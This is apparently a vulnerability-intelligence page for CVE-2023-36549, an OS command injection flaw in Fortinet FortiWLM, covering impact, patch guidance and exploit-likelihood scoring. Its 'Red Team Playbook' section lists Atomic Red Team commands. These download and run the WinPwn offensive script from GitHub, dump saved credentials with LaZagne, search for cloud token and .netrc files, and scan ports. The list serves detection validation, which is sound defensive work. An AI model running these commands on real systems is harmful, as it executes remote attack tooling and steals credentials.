CVE-2023-36549
Overview
This vulnerability is an OS command injection caused by improper neutralization of special elements within HTTP GET request parameters. The flaw exists in Fortinet FortiWLM versions 8.5.0 through 8.5.4 and 8.6.0 through 8.6.5, specifically affecting the web interface's request handling component. Unsanitized input allows injection of arbitrary operating system commands through crafted parameters, bypassing input validation mechanisms.
Vulnerability Description
A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specifically crafted http get request parameters.
Impact
An attacker with low privileges and network access to the FortiWLM web interface can execute arbitrary OS commands remotely without user interaction, leading to full compromise of the affected system. This enables unauthorized code execution, potentially resulting in data exfiltration, service disruption, or lateral movement within the network. The CVSS vector indicates low attack complexity and no user interaction required (AV:N/AC:L/UI:N), with high confidentiality, integrity, and availability impacts (C:H/I:H/A:H).
Solution
Fortinet has released patches addressing this vulnerability in FortiWLM versions beyond 8.5.4 and 8.6.5. Administrators should apply the updates as detailed in the FortiGuard advisory FG-IR-23-140 (https://fortiguard.com/psirt/FG-IR-23-140). No specific workarounds are provided; immediate upgrade to the fixed versions is recommended to eliminate the injection risk.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Fortinet FortiWLM arises from improper neutralization of special elements used in operating system commands, commonly referred to as OS command injection. This flaw allows an attacker to manipulate HTTP GET request parameters to execute arbitrary commands on the server. The affected versions, specifically FortiWLM versions 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4, lack adequate input validation, enabling malicious actors to craft requests that can bypass security controls. By exploiting this vulnerability, attackers can gain unauthorized access to the underlying operating system, potentially leading to full system compromise.
Attack vectors for this vulnerability primarily involve sending specially crafted HTTP GET requests to the FortiWLM management interface. An attacker could leverage tools such as curl or custom scripts to automate the process of sending these requests, embedding malicious payloads that execute system commands. For example, an attacker could retrieve sensitive information, manipulate system configurations, or deploy malware on the affected system. The ease of exploitation, combined with the high privileges typically associated with management interfaces, significantly increases the risk of successful attacks.
The real-world impact of this vulnerability can be severe, particularly for organizations relying on FortiWLM for wireless network management. Successful exploitation could lead to unauthorized access to sensitive data, disruption of network services, or even lateral movement within the organization’s infrastructure. The business risks include reputational damage, financial loss due to downtime or data breaches, and potential regulatory penalties if sensitive information is exposed. The high CVSS score of 9.8 indicates that this vulnerability poses a critical threat, necessitating immediate attention from affected organizations.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating FortiWLM to the latest patched versions is crucial to close the security gap. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests before they reach the application layer. Intrusion detection systems (IDS) should also be configured to monitor for unusual patterns of HTTP requests that may indicate exploitation attempts. Furthermore, conducting regular security assessments and penetration testing can help identify and remediate vulnerabilities before they can be exploited by attackers.
In conclusion, the OS command injection vulnerability in Fortinet FortiWLM presents a significant threat to organizations utilizing this network management solution. The potential for unauthorized command execution through crafted HTTP requests underscores the importance of robust input validation and security best practices. By prioritizing timely updates, employing security monitoring tools, and conducting thorough vulnerability assessments, organizations can mitigate the risks associated with this vulnerability and protect their critical assets from exploitation.
CSURFACE threat intelligence has detected a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2023-36549, rising by approximately 15% over the past week. This upward trend, while not yet classified as rapid, indicates growing potential for exploitation attempts targeting the Fortinet FortiWLM vulnerability. Although no new exploit techniques or proof-of-concept code have surfaced in our telemetry, the incremental rise in EPSS suggests heightened attacker interest or preparatory activity in the threat landscape. For defenders, this signals a need for increased vigilance as the vulnerability’s exploitation likelihood is trending upward, potentially leading to more frequent or sophisticated attacks. Consequently, the overall risk posture associated with this critical OS command injection flaw has shifted from stable to cautiously elevated, underscoring the importance of continuous monitoring despite the absence of confirmed active exploitation campaigns.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortiwlm | All |
cpe:2.3:a:fortinet:fortiwlm:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiwlm | All |
cpe:2.3:a:fortinet:fortiwlm:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-36549 |
| fortiguard.com |
GitHub CVE
|
https://fortiguard.com/psirt/FG-IR-23-140 |